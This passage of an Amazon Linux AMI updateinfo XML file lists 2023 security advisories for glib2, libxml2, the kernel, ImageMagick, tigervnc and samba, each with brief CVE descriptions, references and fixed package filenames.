release="16.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-debuginfo-2.4.40-16.36.amzn1.x86_64.rpm</filename></package><package name="openldap-servers-sql" version="2.4.40" release="16.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-sql-2.4.40-16.36.amzn1.x86_64.rpm</filename></package><package name="openldap-clients" version="2.4.40" release="16.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-clients-2.4.40-16.36.amzn1.x86_64.rpm</filename></package><package name="openldap-clients" version="2.4.40" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-clients-2.4.40-16.36.amzn1.i686.rpm</filename></package><package name="openldap-servers" version="2.4.40" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-2.4.40-16.36.amzn1.i686.rpm</filename></package><package name="openldap-devel" version="2.4.40" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-devel-2.4.40-16.36.amzn1.i686.rpm</filename></package><package name="openldap" version="2.4.40" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-2.4.40-16.36.amzn1.i686.rpm</filename></package><package name="openldap-debuginfo" version="2.4.40" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-debuginfo-2.4.40-16.36.amzn1.i686.rpm</filename></package><package name="openldap-servers-sql" version="2.4.40" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-sql-2.4.40-16.36.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1742</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1742: important priority package update for glib2</title><issued date="2023-04-27 16:19:00" /><updated date="2023-05-03 18:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-25180:
The upstream bug report describes this issue as follows:
A vulnerability was found in GLib2.0, where DoS caused by handling a malicious text-form variant which is structured to cause looping superlinear to its text size. Applications are at risk if they parse untrusted text-form variants.
CVE-2023-24593:
The upstream bug report describes this issue as follows:
A vulnerability was found in GLib2.0, where DoS caused by handling a malicious text-form variant which is structured to cause looping superlinear to its text size. Applications are at risk if they parse untrusted text-form variants.
CVE-2021-3800:
A flaw was found in glib before version 2.63.6. Due to random charset alias, pkexec can leak content from files owned by privileged users to unprivileged ones under the right condition.
CVE-2021-28153:
An issue was discovered in GNOME GLib before 2.66.8. When g_file_replace() is used with G_FILE_CREATE_REPLACE_DESTINATION to replace a path that is a dangling symlink, it incorrectly also creates the target of the symlink as an empty file, which could conceivably have security relevance if the symlink is attacker-controlled. (If the path is a symlink to a file that already exists, then the contents of that file correctly remain unchanged.)
CVE-2019-13012:
The keyfile settings backend in GNOME GLib (aka glib2.0) before 2.60.0 creates directories using g_file_make_directory_with_parents (kfsb->dir, NULL, NULL) and files using g_file_replace_contents (kfsb->file, contents, length, NULL, FALSE, G_FILE_CREATE_REPLACE_DESTINATION, NULL, NULL, NULL). Consequently, it does not properly restrict directory (and file) permissions. Instead, for directories, 0777 permissions are used; for files, default file permissions are used. This is similar to CVE-2019-12450.
CVE-2018-16429:
GNOME GLib 2.56.1 has an out-of-bounds read vulnerability in g_markup_parse_context_parse() in gmarkup.c, related to utf8_str().
CVE-2018-16428:
In GNOME GLib 2.56.1, g_markup_parse_context_end_parse() in gmarkup.c has a NULL pointer dereference.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16428" title="" id="CVE-2018-16428" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16429" title="" id="CVE-2018-16429" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13012" title="" id="CVE-2019-13012" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28153" title="" id="CVE-2021-28153" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3800" title="" id="CVE-2021-3800" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24593" title="" id="CVE-2023-24593" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25180" title="" id="CVE-2023-25180" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glib2-debuginfo" version="2.36.3" release="5.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-debuginfo-2.36.3-5.23.amzn1.x86_64.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-fam-2.36.3-5.23.amzn1.x86_64.rpm</filename></package><package name="glib2-doc" version="2.36.3" release="5.23.amzn1" epoch="0" arch="noarch"><filename>Packages/glib2-doc-2.36.3-5.23.amzn1.noarch.rpm</filename></package><package name="glib2" version="2.36.3" release="5.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-2.36.3-5.23.amzn1.x86_64.rpm</filename></package><package name="glib2-devel" version="2.36.3" release="5.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-devel-2.36.3-5.23.amzn1.x86_64.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.23.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-fam-2.36.3-5.23.amzn1.i686.rpm</filename></package><package name="glib2" version="2.36.3" release="5.23.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-2.36.3-5.23.amzn1.i686.rpm</filename></package><package name="glib2-debuginfo" version="2.36.3" release="5.23.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-debuginfo-2.36.3-5.23.amzn1.i686.rpm</filename></package><package name="glib2-devel" version="2.36.3" release="5.23.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-devel-2.36.3-5.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1743</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1743: medium priority package update for libxml2</title><issued date="2023-04-27 16:19:00" /><updated date="2023-05-03 18:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-29469:
libxml2 Hashing of empty dict strings isn't deterministic. When hashing empty strings which aren't null-terminated, xmlDictComputeFastKey could produce inconsistent results. This could lead to various logic or memory errors, including double frees.
CVE-2023-28484:
A NULL pointer dereference exists when parsing (invalid) XML schemas in libxml2 xmlSchemaCheckCOSSTDerivedOK
CVE-2022-40304:
An issue was discovered in libxml2 before 2.10.3. Certain invalid XML entity definitions can corrupt a hash table key, potentially leading to subsequent logic errors. In one case, a double-free can be provoked.
CVE-2022-40303:
An issue was discovered in libxml2 before 2.10.3. When parsing a multi-gigabyte XML document with the XML_PARSE_HUGE parser option enabled, several integer counters can overflow. This results in an attempt to access an array at a negative 2GB offset, typically leading to a segmentation fault.
CVE-2022-29824:
A flaw was found in the libxml2 library in functions used to manipulate the xmlBuf and the xmlBuffer types. A substantial input causes values to calculate buffer sizes to overflow, resulting in an out-of-bounds write.
CVE-2022-23308:
valid.c in libxml2 before 2.9.13 has a use-after-free of ID and IDREF attributes.
CVE-2021-3541:
A flaw was found in libxml2. Exponential entity expansion attack its possible bypassing all existing protection mechanisms and leading to denial of service.
CVE-2021-3537:
A NULL pointer dereference flaw was found in libxml2, where it did not propagate errors while parsing XML mixed content. This flaw causes the application to crash if an untrusted XML document is parsed in recovery mode and post validated. The highest threat from this vulnerability is to system availability.
CVE-2021-3518:
There's a flaw in libxml2. An attacker who is able to submit a crafted file to be processed by an application linked with libxml2 could trigger a use-after-free. The greatest impact from this flaw is to confidentiality, integrity, and availability.
CVE-2021-3517:
There is a flaw in the xml entity encoding functionality of libxml2. An attacker who is able to supply a crafted file to be processed by an application linked with the affected functionality of libxml2 could trigger an out-of-bounds read. The most likely impact of this flaw is to application availability, with some potential impact to confidentiality and integrity if an attacker is able to use memory information to further exploit the application.
CVE-2021-3516:
There's a flaw in libxml2's xmllint. An attacker who is able to submit a crafted file to be processed by xmllint could trigger a use-after-free. The greatest impact of this flaw is to confidentiality, integrity, and availability.
CVE-2020-24977:
GNOME project libxml2 v2.9.10 has a global buffer over-read vulnerability in xmlEncodeEntitiesInternal at libxml2/entities.c. The issue has been fixed in commit 50f06b3e.
CVE-2017-16931:
parser.c in libxml2 before 2.9.5 mishandles parameter-entity references because the NEXTL macro calls the xmlParserHandlePEReference function in the case of a '%' character in a DTD name.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16931" title="" id="CVE-2017-16931" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24977" title="" id="CVE-2020-24977" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3516" title="" id="CVE-2021-3516" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3517" title="" id="CVE-2021-3517" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3518" title="" id="CVE-2021-3518" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3537" title="" id="CVE-2021-3537" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3541" title="" id="CVE-2021-3541" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23308" title="" id="CVE-2022-23308" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29824" title="" id="CVE-2022-29824" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40303" title="" id="CVE-2022-40303" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40304" title="" id="CVE-2022-40304" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28484" title="" id="CVE-2023-28484" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29469" title="" id="CVE-2023-29469" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxml2" version="2.9.1" release="6.6.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.9.1-6.6.42.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.6.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.9.1-6.6.42.amzn1.x86_64.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.6.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.9.1-6.6.42.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.6.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.9.1-6.6.42.amzn1.x86_64.rpm</filename></package><package name="libxml2-python26" version="2.9.1" release="6.6.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python26-2.9.1-6.6.42.amzn1.x86_64.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.6.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python27-2.9.1-6.6.42.amzn1.x86_64.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.6.42.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python27-2.9.1-6.6.42.amzn1.i686.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.6.42.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.9.1-6.6.42.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.6.42.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.9.1-6.6.42.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.6.42.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.9.1-6.6.42.amzn1.i686.rpm</filename></package><package name="libxml2-python26" version="2.9.1" release="6.6.42.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python26-2.9.1-6.6.42.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.6.42.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.9.1-6.6.42.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1744</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1744: medium priority package update for kernel</title><issued date="2023-05-11 18:00:00" /><updated date="2023-05-23 20:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-31436:
qfq_change_class in net/sched/sch_qfq.c in the Linux kernel before 6.2.13 allows an out-of-bounds write because lmax can exceed QFQ_MIN_LMAX.
CVE-2023-2513:
A use-after-free vulnerability was found in the Linux kernel's ext4 filesystem in the way it handled the extra inode size for extended attributes. This flaw could allow a privileged local user to cause a system crash or other undefined behaviors.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2513" title="" id="CVE-2023-2513" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31436" title="" id="CVE-2023-31436" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="4.14.314" release="164.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.314-164.533.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.314" release="164.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.314-164.533.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.314" release="164.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.314-164.533.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.314" release="164.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.314-164.533.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.314" release="164.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.314-164.533.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.314" release="164.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.314-164.533.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.314" release="164.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.314-164.533.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.314" release="164.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.314-164.533.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.314" release="164.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.314-164.533.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.314" release="164.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.314-164.533.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.314" release="164.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.314-164.533.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.314" release="164.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.314-164.533.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.314" release="164.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.314-164.533.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.314" release="164.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.314-164.533.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.314" release="164.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.314-164.533.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.314" release="164.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.314-164.533.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.314" release="164.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.314-164.533.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.314" release="164.533.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.314-164.533.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.314" release="164.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.314-164.533.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.314" release="164.533.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.314-164.533.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1745</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1745: medium priority package update for ImageMagick</title><issued date="2023-05-11 18:00:00" /><updated date="2023-05-23 20:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-1289:
A vulnerability was discovered in ImageMagick where a specially created SVG file loads itself and causes a segmentation fault. This flaw allows a remote attacker to pass a specially crafted SVG file that leads to a segmentation fault, generating many trash files in "/tmp," resulting in a denial of service. When ImageMagick crashes, it generates a lot of trash files. These trash files can be large if the SVG file contains many render actions. In a denial of service attack, if a remote attacker uploads an SVG file of size t, ImageMagick generates files of size 103*t. If an attacker uploads a 100M SVG, the server will generate about 10G.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1289" title="" id="CVE-2023-1289" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ImageMagick-devel" version="6.9.10.97" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-devel-6.9.10.97-1.25.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.97" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-doc-6.9.10.97-1.25.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.97" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-perl-6.9.10.97-1.25.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.97" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-devel-6.9.10.97-1.25.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.9.10.97" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-6.9.10.97-1.25.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.97" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-6.9.10.97-1.25.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.97" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-debuginfo-6.9.10.97-1.25.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.97" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-6.9.10.97-1.25.amzn1.i686.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.97" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-debuginfo-6.9.10.97-1.25.amzn1.i686.rpm</filename></package><package name="ImageMagick" version="6.9.10.97" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-6.9.10.97-1.25.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.97" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-devel-6.9.10.97-1.25.amzn1.i686.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.97" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-devel-6.9.10.97-1.25.amzn1.i686.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.97" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-perl-6.9.10.97-1.25.amzn1.i686.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.97" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-doc-6.9.10.97-1.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1746</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1746: important priority package update for tigervnc</title><issued date="2023-05-11 18:00:00" /><updated date="2023-05-23 20:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-0494:
A vulnerability was found in X.Org. This issue occurs due to a dangling pointer in DeepCopyPointerClasses that can be exploited by ProcXkbSetDeviceInfo() and ProcXkbGetDeviceInfo() to read and write into freed memory. This can lead to local privilege elevation on systems where the X server runs privileged and remote code execution for ssh X forwarding sessions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0494" title="" id="CVE-2023-0494" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tigervnc-debuginfo" version="1.8.0" release="21.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-debuginfo-1.8.0-21.35.amzn1.x86_64.rpm</filename></package><package name="tigervnc-server" version="1.8.0" release="21.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-server-1.8.0-21.35.amzn1.x86_64.rpm</filename></package><package name="tigervnc-server-module" version="1.8.0" release="21.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-server-module-1.8.0-21.35.amzn1.x86_64.rpm</filename></package><package name="tigervnc" version="1.8.0" release="21.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-1.8.0-21.35.amzn1.x86_64.rpm</filename></package><package name="tigervnc-debuginfo" version="1.8.0" release="21.35.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-debuginfo-1.8.0-21.35.amzn1.i686.rpm</filename></package><package name="tigervnc" version="1.8.0" release="21.35.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-1.8.0-21.35.amzn1.i686.rpm</filename></package><package name="tigervnc-server-module" version="1.8.0" release="21.35.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-server-module-1.8.0-21.35.amzn1.i686.rpm</filename></package><package name="tigervnc-server" version="1.8.0" release="21.35.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-server-1.8.0-21.35.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1747</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1747: important priority package update for samba</title><issued date="2023-05-11 18:00:00" /><updated date="2023-05-23 20:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-38023:
Netlogon RPC Elevation of Privilege Vulnerability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38023" title="" id="CVE-2022-38023" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="samba" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-modules" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="ctdb" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-libs" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="libwbclient" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.10.16" release="24.66.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.10.16-24.66.amzn1.noarch.rpm</filename></package><package name="samba-debuginfo" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-python-test" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-test-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.10.16" release="24.66.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.10.16-24.66.amzn1.noarch.rpm</filename></package><package name="samba-common-tools" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-python" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-client-libs" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-krb5-printing" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-krb5-printing-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-python-test" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-test-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" 